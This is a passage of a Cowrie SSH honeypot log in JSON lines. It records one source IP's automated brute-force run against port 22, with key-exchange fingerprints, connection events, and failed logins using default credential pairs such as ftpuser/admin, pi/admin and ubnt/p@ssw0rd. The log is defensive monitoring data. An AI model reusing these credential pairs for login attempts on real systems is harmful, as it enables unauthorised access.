m","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:40.528220Z","src_ip":"87.120.191.13","session":"8a866e6a23ab"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:40.535657Z","src_ip":"87.120.191.13","session":"0c372f3237d9"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:40.536242Z","src_ip":"87.120.191.13","session":"0c372f3237d9"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:40.613680Z","src_ip":"87.120.191.13","session":"5da0a80b8c68"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:40.666605Z","src_ip":"87.120.191.13","session":"4526d66c241c"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:40.857373Z","src_ip":"87.120.191.13","session":"2fe5721ecd88"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55178,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2d015c81bc8","protocol":"ssh","message":"New connection: 87.120.191.13:55178 (1.2.3.4:22) [session: a2d015c81bc8]","sensor":"my-vps","timestamp":"2025-08-26T01:53:40.908326Z"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin","message":"login attempt [ftpuser/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:40.935426Z","src_ip":"87.120.191.13","session":"df062185c881"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:41.017852Z","src_ip":"87.120.191.13","session":"a2d015c81bc8"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:41.018719Z","src_ip":"87.120.191.13","session":"a2d015c81bc8"}
{"eventid":"cowrie.login.failed","username":"noc","password":"admin","message":"login attempt [noc/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:41.046041Z","src_ip":"87.120.191.13","session":"5da0a80b8c68"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"admin","message":"login attempt [ubnt/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:41.102984Z","src_ip":"87.120.191.13","session":"4526d66c241c"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin","message":"login attempt [ftpuser/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:41.106096Z","src_ip":"87.120.191.13","session":"0c372f3237d9"}
{"eventid":"cowrie.login.failed","username":"student","password":"admin","message":"login attempt [student/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:41.113642Z","src_ip":"87.120.191.13","session":"8a866e6a23ab"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:41.328866Z","src_ip":"87.120.191.13","session":"a2d015c81bc8"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:41.429839Z","src_ip":"87.120.191.13","session":"e72878e10dcb"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55194,"dst_ip":"1.2.3.4","dst_port":22,"session":"585b182d8b52","protocol":"ssh","message":"New connection: 87.120.191.13:55194 (1.2.3.4:22) [session: 585b182d8b52]","sensor":"my-vps","timestamp":"2025-08-26T01:53:41.452672Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:41.453630Z","src_ip":"87.120.191.13","session":"585b182d8b52"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:41.473912Z","src_ip":"87.120.191.13","session":"585b182d8b52"}
{"eventid":"cowrie.login.failed","username":"pi","password":"admin","message":"login attempt [pi/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:41.534946Z","src_ip":"87.120.191.13","session":"585b182d8b52"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:41.956745Z","src_ip":"87.120.191.13","session":"df062185c881"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55204,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc1ee94adf43","protocol":"ssh","message":"New connection: 87.120.191.13:55204 (1.2.3.4:22) [session: bc1ee94adf43]","sensor":"my-vps","timestamp":"2025-08-26T01:53:41.976062Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:41.976876Z","src_ip":"87.120.191.13","session":"bc1ee94adf43"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:41.996999Z","src_ip":"87.120.191.13","session":"bc1ee94adf43"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"p@ssw0rd","message":"login attempt [ftpuser/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.059147Z","src_ip":"87.120.191.13","session":"bc1ee94adf43"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.067536Z","src_ip":"87.120.191.13","session":"5da0a80b8c68"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55218,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7bbd9a84983","protocol":"ssh","message":"New connection: 87.120.191.13:55218 (1.2.3.4:22) [session: f7bbd9a84983]","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.087500Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.089021Z","src_ip":"87.120.191.13","session":"f7bbd9a84983"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.108861Z","src_ip":"87.120.191.13","session":"f7bbd9a84983"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.124575Z","src_ip":"87.120.191.13","session":"4526d66c241c"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.126855Z","src_ip":"87.120.191.13","session":"0c372f3237d9"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.134604Z","src_ip":"87.120.191.13","session":"8a866e6a23ab"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55220,"dst_ip":"1.2.3.4","dst_port":22,"session":"382f701fde9b","protocol":"ssh","message":"New connection: 87.120.191.13:55220 (1.2.3.4:22) [session: 382f701fde9b]","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.144433Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.145153Z","src_ip":"87.120.191.13","session":"382f701fde9b"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55234,"dst_ip":"1.2.3.4","dst_port":22,"session":"85ad5ed6a55f","protocol":"ssh","message":"New connection: 87.120.191.13:55234 (1.2.3.4:22) [session: 85ad5ed6a55f]","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.146554Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.147645Z","src_ip":"87.120.191.13","session":"85ad5ed6a55f"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55238,"dst_ip":"1.2.3.4","dst_port":22,"session":"85d34dfc0c37","protocol":"ssh","message":"New connection: 87.120.191.13:55238 (1.2.3.4:22) [session: 85d34dfc0c37]","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.154017Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.154495Z","src_ip":"87.120.191.13","session":"85d34dfc0c37"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.165587Z","src_ip":"87.120.191.13","session":"382f701fde9b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.168534Z","src_ip":"87.120.191.13","session":"85ad5ed6a55f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.174832Z","src_ip":"87.120.191.13","session":"85d34dfc0c37"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"p@ssw0rd","message":"login attempt [ubnt/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.227826Z","src_ip":"87.120.191.13","session":"382f701fde9b"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"p@ssw0rd","message":"login attempt [ftpuser/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.233336Z","src_ip":"87.120.191.13","session":"85ad5ed6a55f"}
{"eventid":"cowrie.login.failed","username":"student","password":"p@ssw0rd","message":"login attempt [student/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.236528Z","src_ip":"87.120.191.13","session":"85d34dfc0c37"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.349677Z","src_ip":"87.120.191.13","session":"a2d015c81bc8"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55248,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ee251251431","protocol":"ssh","message":"New connection: 87.120.191.13:55248 (1.2.3.4:22) [session: 0ee251251431]","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.370703Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.371626Z","src_ip":"87.120.191.13","session":"0ee251251431"}
